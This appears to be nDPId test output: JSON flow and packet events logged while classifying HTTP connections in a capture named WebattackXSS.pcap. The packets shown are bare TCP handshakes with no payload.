-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347693386,"flow_last_seen":1499347698807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347694661,"flow_last_seen":1499347699807,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812802,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347814066,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347814066,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NuNAAD4Gju2sEAABwKgKMoDOAFApMBSaAAAAAKACchB8ZgAAAgQFtAQCCAoBPCJ5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":2,"flow_last_seen":1499347814066,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347814066,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgM6yTRTHKTAUm6AScSC+XAAAAgQFtAQCCAoD5fPuATwieQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":3,"flow_last_seen":1499347814067,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347814067,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NuRAAD4GjvSsEAABwKgKMoDOAFApMBSbsk0UyIAQAOVdZAAAAQEICgE8InkD5fPu"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347815351,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347815351,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aqNAAD4GWy2sEAABwKgKMoDcAFBV2UkZAAAAAKACchAZ7wAAAgQFtAQCCAoBPCO6AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":2,"flow_last_seen":1499347815351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347815351,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgNzeXu4gVdlJGqAScSBVOQAAAgQFtAQCCAoD5fUvATwjugEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":3,"flow_last_seen":1499347815352,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347815352,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aqRAAD4GWzSsEAABwKgKMoDcAFBV2Uka3l7uIYAQAOX0PwAAAQEICgE8I7sD5fUv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347816657,"flow_last_seen":1499347816657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347816657,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1499347816657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lQ1AAD4GMMOsEAABwKgKMoDqAFAyzLAMAAAAAKACchDUswAAAgQFtAQCCAoBPCUBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":2,"flow_last_seen":1499347816658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgOp6zxHVMsywDaAScSBOkwAAAgQFtAQCCAoD5fZ1ATwlAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":3,"flow_last_seen":1499347816658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347816658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lQ5AAD4GMMqsEAABwKgKMoDqAFAyzLANes8R1oAQAOXtmgAAAQEICgE8JQED5fZ1"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347819250,"flow_last_seen":1499347819250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347819250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1499347819250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LORAAD4GmOysEAABwKgKMoEEAFDtQwttAAAAAKACchC8OQAAAgQFtAQCCAoBPCeJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":2,"flow_last_seen":1499347819251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgQQkyBmr7UMLbqAScSCBwQAAAgQFtAQCCAoD5fj+ATwniQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":3,"flow_last_seen":1499347819251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347819251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LOVAAD4GmPOsEAABwKgKMoEEAFDtQwtuJMgZrIAQAOUgyQAAAQEICgE8J4kD5fj+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347820510,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347820510,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zKZAAD4G+SmsEAABwKgKMoESAFBNgeRiAAAAAKACchCBvQAAAgQFtAQCCAoBPCjEAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":2,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgRIUqvVqTYHkY6AScSB6aAAAAgQFtAQCCAoD5fo5ATwoxAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":3,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zKdAAD4G+TCsEAABwKgKMoESAFBNgeRjFKr1a4AQAOUZcAAAAQEICgE8KMQD5fo5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347823117,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vRAAD4GxtusEAABwKgKMoEsAFBFq9WkAAAAAKACchCVqwAAAgQFtAQCCAoBPCtQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":2,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgSyhFRrnRavVpaAScSDZ4wAAAgQFtAQCCAoD5fzEATwrUAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":3,"flow_last_seen":1499347823118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347823118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vVAAD4GxuKsEAABwKgKMoEsAFBFq9WloRUa6IAQAOV46wAAAQEICgE8K1AD5fzE"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347824426,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347824426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80mVAAD4G82qsEAABwKgKMoE6AFCPwv7yAAAAAKACchAg8QAAAgQFtAQCCAoBPCyXAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":2,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgToZT9eBj8L+86AScSAvDQAAAgQFtAQCCAoD5f4MATwslwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":3,"flow_last_seen":1499347824427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347824427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00mZAAD4G83GsEAABwKgKMoE6AFCPwv7zGU\/XgoAQAOXOFAAAAQEICgE8LJcD5f4M"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347825732,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347825732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Tq1AAD4GdyOsEAABwKgKMoFIAFDgbWNwAAAAAKACchBqdAAAAgQFtAQCCAoBPC3dAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":2,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgUjyJE\/d4G1jcaAScSAmGQAAAgQFtAQCCAoD5f9SATwt3QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":3,"flow_last_seen":1499347825733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347825733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Tq5AAD4GdyqsEAABwKgKMoFIAFDgbWNx8iRP3oAQAOXFHwAAAQEICgE8Ld4D5f9S"} 
